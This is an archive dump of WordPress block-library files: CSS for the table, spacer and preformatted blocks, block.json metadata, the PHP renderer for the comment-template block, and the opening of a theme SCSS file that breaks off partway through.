0ustar00.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{
  height:auto;
}
.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{
  width:auto;
}
.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{
  word-break:break-word;
}
.wp-block[data-align=center]>.wp-block-table{
  text-align:initial;
}
.wp-block[data-align=center]>.wp-block-table table{
  margin:0 auto;
}
.wp-block-table td,.wp-block-table th{
  border:1px solid;
  padding:.5em;
}
.wp-block-table td.is-selected,.wp-block-table th.is-selected{
  border-color:var(--wp-admin-theme-color);
  border-style:double;
  box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color);
}
.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{
  border:1px solid;
}

.blocks-table__placeholder-form.blocks-table__placeholder-form{
  align-items:flex-start;
  display:flex;
  flex-direction:column;
  gap:8px;
}
@media (min-width:782px){
  .blocks-table__placeholder-form.blocks-table__placeholder-form{
    align-items:flex-end;
    flex-direction:row;
  }
}

.blocks-table__placeholder-input{
  width:112px;
}table/theme.css000060400000000405151330427370007447 0ustar00.wp-block-table{
  margin:0 0 1em;
}
.wp-block-table td,.wp-block-table th{
  word-break:normal;
}
.wp-block-table :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-table :where(figcaption){
  color:#ffffffa6;
}table/editor-rtl.css000060400000003071151330427370010434 0ustar00.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{
  height:auto;
}
.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{
  width:auto;
}
.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{
  word-break:break-word;
}
.wp-block[data-align=center]>.wp-block-table{
  text-align:initial;
}
.wp-block[data-align=center]>.wp-block-table table{
  margin:0 auto;
}
.wp-block-table td,.wp-block-table th{
  border:1px solid;
  padding:.5em;
}
.wp-block-table td.is-selected,.wp-block-table th.is-selected{
  border-color:var(--wp-admin-theme-color);
  border-style:double;
  box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color);
}
.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{
  border:1px solid;
}

.blocks-table__placeholder-form.blocks-table__placeholder-form{
  align-items:flex-start;
  display:flex;
  flex-direction:column;
  gap:8px;
}
@media (min-width:782px){
  .blocks-table__placeholder-form.blocks-table__placeholder-form{
    align-items:flex-end;
    flex-direction:row;
  }
}

.blocks-table__placeholder-input{
  width:112px;
}table/theme.min.css000060400000000350151330427370010230 0ustar00.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}table/theme-rtl.min.css000060400000000350151330427370011027 0ustar00.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}table/block.json000060400000010427151330427370007625 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/table",
	"title": "Table",
	"category": "text",
	"description": "Create structured content in rows and columns to display information.",
	"textdomain": "default",
	"attributes": {
		"hasFixedLayout": {
			"type": "boolean",
			"default": true
		},
		"caption": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "figcaption"
		},
		"head": {
			"type": "array",
			"default": [],
			"source": "query",
			"selector": "thead tr",
			"query": {
				"cells": {
					"type": "array",
					"default": [],
					"source": "query",
					"selector": "td,th",
					"query": {
						"content": {
							"type": "rich-text",
							"source": "rich-text"
						},
						"tag": {
							"type": "string",
							"default": "td",
							"source": "tag"
						},
						"scope": {
							"type": "string",
							"source": "attribute",
							"attribute": "scope"
						},
						"align": {
							"type": "string",
							"source": "attribute",
							"attribute": "data-align"
						},
						"colspan": {
							"type": "string",
							"source": "attribute",
							"attribute": "colspan"
						},
						"rowspan": {
							"type": "string",
							"source": "attribute",
							"attribute": "rowspan"
						}
					}
				}
			}
		},
		"body": {
			"type": "array",
			"default": [],
			"source": "query",
			"selector": "tbody tr",
			"query": {
				"cells": {
					"type": "array",
					"default": [],
					"source": "query",
					"selector": "td,th",
					"query": {
						"content": {
							"type": "rich-text",
							"source": "rich-text"
						},
						"tag": {
							"type": "string",
							"default": "td",
							"source": "tag"
						},
						"scope": {
							"type": "string",
							"source": "attribute",
							"attribute": "scope"
						},
						"align": {
							"type": "string",
							"source": "attribute",
							"attribute": "data-align"
						},
						"colspan": {
							"type": "string",
							"source": "attribute",
							"attribute": "colspan"
						},
						"rowspan": {
							"type": "string",
							"source": "attribute",
							"attribute": "rowspan"
						}
					}
				}
			}
		},
		"foot": {
			"type": "array",
			"default": [],
			"source": "query",
			"selector": "tfoot tr",
			"query": {
				"cells": {
					"type": "array",
					"default": [],
					"source": "query",
					"selector": "td,th",
					"query": {
						"content": {
							"type": "rich-text",
							"source": "rich-text"
						},
						"tag": {
							"type": "string",
							"default": "td",
							"source": "tag"
						},
						"scope": {
							"type": "string",
							"source": "attribute",
							"attribute": "scope"
						},
						"align": {
							"type": "string",
							"source": "attribute",
							"attribute": "data-align"
						},
						"colspan": {
							"type": "string",
							"source": "attribute",
							"attribute": "colspan"
						},
						"rowspan": {
							"type": "string",
							"source": "attribute",
							"attribute": "rowspan"
						}
					}
				}
			}
		}
	},
	"supports": {
		"anchor": true,
		"align": true,
		"color": {
			"__experimentalSkipSerialization": true,
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"__experimentalBorder": {
			"__experimentalSkipSerialization": true,
			"color": true,
			"style": true,
			"width": true,
			"__experimentalDefaultControls": {
				"color": true,
				"style": true,
				"width": true
			}
		},
		"__experimentalSelector": ".wp-block-table > table",
		"interactivity": {
			"clientNavigation": true
		}
	},
	"styles": [
		{
			"name": "regular",
			"label": "Default",
			"isDefault": true
		},
		{ "name": "stripes", "label": "Stripes" }
	],
	"editorStyle": "wp-block-table-editor",
	"style": "wp-block-table"
}
table/editor-rtl.min.css000060400000002727151330427370011225 0ustar00.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{height:auto}.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{width:auto}.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{word-break:break-word}.wp-block[data-align=center]>.wp-block-table{text-align:initial}.wp-block[data-align=center]>.wp-block-table table{margin:0 auto}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table td.is-selected,.wp-block-table th.is-selected{border-color:var(--wp-admin-theme-color);border-style:double;box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{border:1px solid}.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-start;display:flex;flex-direction:column;gap:8px}@media (min-width:782px){.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-end;flex-direction:row}}.blocks-table__placeholder-input{width:112px}table/style.min.css000060400000007417151330427370010301 0ustar00.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:initial;border-bottom:1px solid #f0f0f0;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:#0000}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:initial}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:initial}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}table/theme-rtl.css000060400000000405151330427370010246 0ustar00.wp-block-table{
  margin:0 0 1em;
}
.wp-block-table td,.wp-block-table th{
  word-break:normal;
}
.wp-block-table :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-table :where(figcaption){
  color:#ffffffa6;
}table/editor.min.css000060400000002727151330427370010426 0ustar00.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{height:auto}.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{width:auto}.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{word-break:break-word}.wp-block[data-align=center]>.wp-block-table{text-align:initial}.wp-block[data-align=center]>.wp-block-table table{margin:0 auto}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table td.is-selected,.wp-block-table th.is-selected{border-color:var(--wp-admin-theme-color);border-style:double;box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{border:1px solid}.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-start;display:flex;flex-direction:column;gap:8px}@media (min-width:782px){.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-end;flex-direction:row}}.blocks-table__placeholder-input{width:112px}comments-title/editor-rtl.css000060400000000075151330427370012312 0ustar00.wp-block-comments-title.has-background{
  padding:inherit;
}comments-title/editor.css000060400000000075151330427370011513 0ustar00.wp-block-comments-title.has-background{
  padding:inherit;
}comments-title/editor-rtl.min.css000060400000000070151330427370013067 0ustar00.wp-block-comments-title.has-background{padding:inherit}comments-title/editor.min.css000060400000000070151330427370012270 0ustar00.wp-block-comments-title.has-background{padding:inherit}comments-title/block.json000060400000002673151330427370011506 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comments-title",
	"title": "Comments Title",
	"category": "theme",
	"ancestor": [ "core/comments" ],
	"description": "Displays a title with the number of comments.",
	"textdomain": "default",
	"usesContext": [ "postId", "postType" ],
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"showPostTitle": {
			"type": "boolean",
			"default": true
		},
		"showCommentsCount": {
			"type": "boolean",
			"default": true
		},
		"level": {
			"type": "number",
			"default": 2
		}
	},
	"supports": {
		"anchor": false,
		"align": true,
		"html": false,
		"__experimentalBorder": {
			"radius": true,
			"color": true,
			"width": true,
			"style": true
		},
		"color": {
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true,
				"__experimentalFontFamily": true,
				"__experimentalFontStyle": true,
				"__experimentalFontWeight": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
preformatted/style-rtl.css000060400000000226151330427370011712 0ustar00.wp-block-preformatted{
  box-sizing:border-box;
  white-space:pre-wrap;
}

:where(.wp-block-preformatted.has-background){
  padding:1.25em 2.375em;
}preformatted/style.min.css000060400000000207151330427370011674 0ustar00.wp-block-preformatted{box-sizing:border-box;white-space:pre-wrap}:where(.wp-block-preformatted.has-background){padding:1.25em 2.375em}preformatted/style.css000060400000000226151330427370011113 0ustar00.wp-block-preformatted{
  box-sizing:border-box;
  white-space:pre-wrap;
}

:where(.wp-block-preformatted.has-background){
  padding:1.25em 2.375em;
}preformatted/block.json000060400000002146151330427370011231 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/preformatted",
	"title": "Preformatted",
	"category": "text",
	"description": "Add text that respects your spacing and tabs, and also allows styling.",
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "pre",
			"__unstablePreserveWhiteSpace": true,
			"__experimentalRole": "content"
		}
	},
	"supports": {
		"anchor": true,
		"color": {
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"padding": true,
			"margin": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-preformatted"
}
preformatted/style-rtl.min.css000060400000000207151330427370012473 0ustar00.wp-block-preformatted{box-sizing:border-box;white-space:pre-wrap}:where(.wp-block-preformatted.has-background){padding:1.25em 2.375em}comment-template.php000060400000010616151330427370010535 0ustar00<?php
/**
 * Server-side rendering of the `core/comment-template` block.
 *
 * @package WordPress
 */

/**
 * Function that recursively renders a list of nested comments.
 *
 * @since 6.3.0 Changed render_block_context priority to `1`.
 *
 * @global int $comment_depth
 *
 * @param WP_Comment[] $comments        The array of comments.
 * @param WP_Block     $block           Block instance.
 * @return string
 */
function block_core_comment_template_render_comments( $comments, $block ) {
	global $comment_depth;
	$thread_comments       = get_option( 'thread_comments' );
	$thread_comments_depth = get_option( 'thread_comments_depth' );

	if ( empty( $comment_depth ) ) {
		$comment_depth = 1;
	}

	$content = '';
	foreach ( $comments as $comment ) {
		$comment_id           = $comment->comment_ID;
		$filter_block_context = static function ( $context ) use ( $comment_id ) {
			$context['commentId'] = $comment_id;
			return $context;
		};

		/*
		 * We set commentId context through the `render_block_context` filter so
		 * that dynamically inserted blocks (at `render_block` filter stage)
		 * will also receive that context.
		 *
		 * Use an early priority to so that other 'render_block_context' filters
		 * have access to the values.
		 */
		add_filter( 'render_block_context', $filter_block_context, 1 );

		/*
		 * We construct a new WP_Block instance from the parsed block so that
		 * it'll receive any changes made by the `render_block_data` filter.
		 */
		$block_content = ( new WP_Block( $block->parsed_block ) )->render( array( 'dynamic' => false ) );

		remove_filter( 'render_block_context', $filter_block_context, 1 );

		$children = $comment->get_children();

		/*
		 * We need to create the CSS classes BEFORE recursing into the children.
		 * This is because comment_class() uses globals like `$comment_alt`
		 * and `$comment_thread_alt` which are order-sensitive.
		 *
		 * The `false` parameter at the end means that we do NOT want the function
		 * to `echo` the output but to return a string.
		 * See https://developer.wordpress.org/reference/functions/comment_class/#parameters.
		 */
		$comment_classes = comment_class( '', $comment->comment_ID, $comment->comment_post_ID, false );

		// If the comment has children, recurse to create the HTML for the nested
		// comments.
		if ( ! empty( $children ) && ! empty( $thread_comments ) ) {
			if ( $comment_depth < $thread_comments_depth ) {
				++$comment_depth;
				$inner_content  = block_core_comment_template_render_comments(
					$children,
					$block
				);
				$block_content .= sprintf( '<ol>%1$s</ol>', $inner_content );
				--$comment_depth;
			} else {
				$block_content .= block_core_comment_template_render_comments(
					$children,
					$block
				);
			}
		}

		$content .= sprintf( '<li id="comment-%1$s" %2$s>%3$s</li>', $comment->comment_ID, $comment_classes, $block_content );
	}

	return $content;
}

/**
 * Renders the `core/comment-template` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the HTML representing the comments using the layout
 * defined by the block's inner blocks.
 */
function render_block_core_comment_template( $attributes, $content, $block ) {
	// Bail out early if the post ID is not set for some reason.
	if ( empty( $block->context['postId'] ) ) {
		return '';
	}

	if ( post_password_required( $block->context['postId'] ) ) {
		return;
	}

	$comment_query = new WP_Comment_Query(
		build_comment_query_vars_from_block( $block )
	);

	// Get an array of comments for the current post.
	$comments = $comment_query->get_comments();
	if ( count( $comments ) === 0 ) {
		return '';
	}

	$comment_order = get_option( 'comment_order' );

	if ( 'desc' === $comment_order ) {
		$comments = array_reverse( $comments );
	}

	$wrapper_attributes = get_block_wrapper_attributes();

	return sprintf(
		'<ol %1$s>%2$s</ol>',
		$wrapper_attributes,
		block_core_comment_template_render_comments( $comments, $block )
	);
}

/**
 * Registers the `core/comment-template` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comment_template() {
	register_block_type_from_metadata(
		__DIR__ . '/comment-template',
		array(
			'render_callback'   => 'render_block_core_comment_template',
			'skip_inner_blocks' => true,
		)
	);
}
add_action( 'init', 'register_block_core_comment_template' );
list-item/block.json000060400000002161151330427370010441 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/list-item",
	"title": "List item",
	"category": "text",
	"parent": [ "core/list" ],
	"allowedBlocks": [ "core/list" ],
	"description": "Create a list item.",
	"textdomain": "default",
	"attributes": {
		"placeholder": {
			"type": "string"
		},
		"content": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "li",
			"__experimentalRole": "content"
		}
	},
	"supports": {
		"className": false,
		"__experimentalSelector": ".wp-block-list > li",
		"splitting": true,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
spacer/editor.min.css000060400000001664151330427370010613 0ustar00.block-editor-block-list__block[data-type="core/spacer"]:before{content:"";display:block;height:100%;min-height:8px;min-width:8px;position:absolute;width:100%;z-index:1}.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{background:#0000001a}.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{background:#ffffff26}.block-library-spacer__resize-container{clear:both}.block-library-spacer__resize-container:not(.is-resizing){height:100%!important;width:100%!important}.block-library-spacer__resize-container .components-resizable-box__handle:before{content:none}.block-library-spacer__resize-container.resize-horizontal{height:100%!important;margin-bottom:0}spacer/style.min.css000060400000000034151330427370010453 0ustar00.wp-block-spacer{clear:both}spacer/editor.css000060400000001775151330427370010034 0ustar00.block-editor-block-list__block[data-type="core/spacer"]:before{
  content:"";
  display:block;
  height:100%;
  min-height:8px;
  min-width:8px;
  position:absolute;
  width:100%;
  z-index:1;
}

.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{
  background:#0000001a;
}
.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{
  background:#ffffff26;
}

.block-library-spacer__resize-container{
  clear:both;
}
.block-library-spacer__resize-container:not(.is-resizing){
  height:100% !important;
  width:100% !important;
}
.block-library-spacer__resize-container .components-resizable-box__handle:before{
  content:none;
}
.block-library-spacer__resize-container.resize-horizontal{
  height:100% !important;
  margin-bottom:0;
}spacer/style-rtl.min.css000060400000000034151330427370011252 0ustar00.wp-block-spacer{clear:both}spacer/style-rtl.css000060400000000041151330427370010466 0ustar00.wp-block-spacer{
  clear:both;
}spacer/editor-rtl.min.css000060400000001664151330427370011412 0ustar00.block-editor-block-list__block[data-type="core/spacer"]:before{content:"";display:block;height:100%;min-height:8px;min-width:8px;position:absolute;width:100%;z-index:1}.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{background:#0000001a}.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{background:#ffffff26}.block-library-spacer__resize-container{clear:both}.block-library-spacer__resize-container:not(.is-resizing){height:100%!important;width:100%!important}.block-library-spacer__resize-container .components-resizable-box__handle:before{content:none}.block-library-spacer__resize-container.resize-horizontal{height:100%!important;margin-bottom:0}spacer/editor-rtl.css000060400000001775151330427370010633 0ustar00.block-editor-block-list__block[data-type="core/spacer"]:before{
  content:"";
  display:block;
  height:100%;
  min-height:8px;
  min-width:8px;
  position:absolute;
  width:100%;
  z-index:1;
}

.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{
  background:#0000001a;
}
.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{
  background:#ffffff26;
}

.block-library-spacer__resize-container{
  clear:both;
}
.block-library-spacer__resize-container:not(.is-resizing){
  height:100% !important;
  width:100% !important;
}
.block-library-spacer__resize-container .components-resizable-box__handle:before{
  content:none;
}
.block-library-spacer__resize-container.resize-horizontal{
  height:100% !important;
  margin-bottom:0;
}spacer/block.json000060400000001245151330427370010011 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/spacer",
	"title": "Spacer",
	"category": "design",
	"description": "Add white space between blocks and customize its height.",
	"textdomain": "default",
	"attributes": {
		"height": {
			"type": "string",
			"default": "100px"
		},
		"width": {
			"type": "string"
		}
	},
	"usesContext": [ "orientation" ],
	"supports": {
		"anchor": true,
		"spacing": {
			"margin": [ "top", "bottom" ],
			"__experimentalDefaultControls": {
				"margin": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-spacer-editor",
	"style": "wp-block-spacer"
}
spacer/style.css000060400000000041151330427370007667 0ustar00.wp-block-spacer{
  clear:both;
}_blocks.scss000060400000050134151331754460007065 0ustar00/* !Block styles */


// Default block margin and alignment rules.
// These are replicated inside of the Group block
// so that child blocks in there appear the same way.
.entry .entry-content > *,
.entry .entry-summary > *,
.entry .entry-summary > .wp-block-group > .wp-block-group__inner-container > *,
.entry .entry-content > .wp-block-group > .wp-block-group__inner-container > * {
	margin: 32px 0;
	max-width: 100%;

	@include postContentMaxWidth();

	@include media(tablet) {
		margin: 32px 0;
	}

	&.alignwide {
		margin-left: auto;
		margin-right: auto;
		clear: both;

		@include media(tablet) {
			width: 100%;
			max-width: 100%;
		}
	}

	&.alignfull {
		position: relative;
		left: -#{$size__spacing-unit };
		width: calc( 100% + (2 * #{$size__spacing-unit}));
		max-width: calc( 100% + (2 * #{$size__spacing-unit}));
		clear: both;

		@include media(tablet) {
			margin-top: calc(2 * #{$size__spacing-unit});
			margin-bottom: calc(2 * #{$size__spacing-unit});
			left: calc( -12.5% - 75px );
			width: calc( 125% + 150px );
			max-width: calc( 125% + 150px );
		}
	}

	&.alignleft {
		/*rtl:ignore*/
		float: left;
		max-width: calc(5 * (100vw / 12));
		margin-top: 0;
		margin-left: 0;
		/*rtl:ignore*/
		margin-right: $size__spacing-unit;

		@include media(tablet) {
			max-width: calc(4 * (100vw / 12));
			/*rtl:ignore*/
			margin-right: calc(2 * #{$size__spacing-unit});
		}
	}

	&.alignright {
		/*rtl:ignore*/
		float: right;
		max-width: calc(5 * (100vw / 12));
		margin-top: 0;
		margin-right: 0;
		/*rtl:ignore*/
		margin-left: $size__spacing-unit;

		@include media(tablet) {
			max-width: calc(4 * (100vw / 12));
			margin-right: 0;
			/*rtl:ignore*/
			margin-left: calc(2 * #{$size__spacing-unit});
		}
	}
	&.aligncenter {
		margin-left: auto;
		margin-right: auto;

		@include postContentMaxWidth();

		@include media(tablet) {
			margin-left: 0;
			margin-right: 0;
		}
	}
}

.entry .entry-content > *,
.entry .entry-summary > * {

	> *:first-child {
		margin-top: 0;
	}

	> *:last-child {
		margin-bottom: 0;
	}
}

/*
 * Unset nested content selector styles
 * - Prevents layout styles from cascading too deeply
 * - helps with plugin compatibility
 */
.entry .entry-content,
.entry .entry-summary {

	.entry-content,
	.entry-summary,
	.entry {
		margin: inherit;
		max-width: inherit;
		padding: inherit;

		@include media(tablet) {
			margin: inherit;
			max-width: inherit;
			padding: inherit;
		}
	}
}

.entry .entry-content {

	//! Paragraphs
	p.has-background {
		padding: 20px 30px;
	}

	//! Audio
	.wp-block-audio {

		width: 100%;

		audio {
			width: 100%;
		}

		&.alignleft audio,
		&.alignright audio {

			max-width: (0.33 * $mobile_width);

			@include media(tablet) {
				max-width: (0.5 * $tablet_width);
			}

			@include media(wide) {
				max-width: (0.33 * $desktop_width);
			}
		}
	}

	//! Video
	.wp-block-video {

		video {
			width: 100%;
		}
	}

	//! Button
	.wp-block-button {

		.wp-block-button__link {
			@include button-transition;
			border: none;
			font-size: $font__size-sm;
			@include font-family( $font__heading );
			line-height: $font__line-height-heading;
			box-sizing: border-box;
			font-weight: bold;
			text-decoration: none;
			padding: ($size__spacing-unit * .76) $size__spacing-unit;
			outline: none;
			outline: none;

			&:not(.has-background) {
				background-color: $color__background-button;
			}

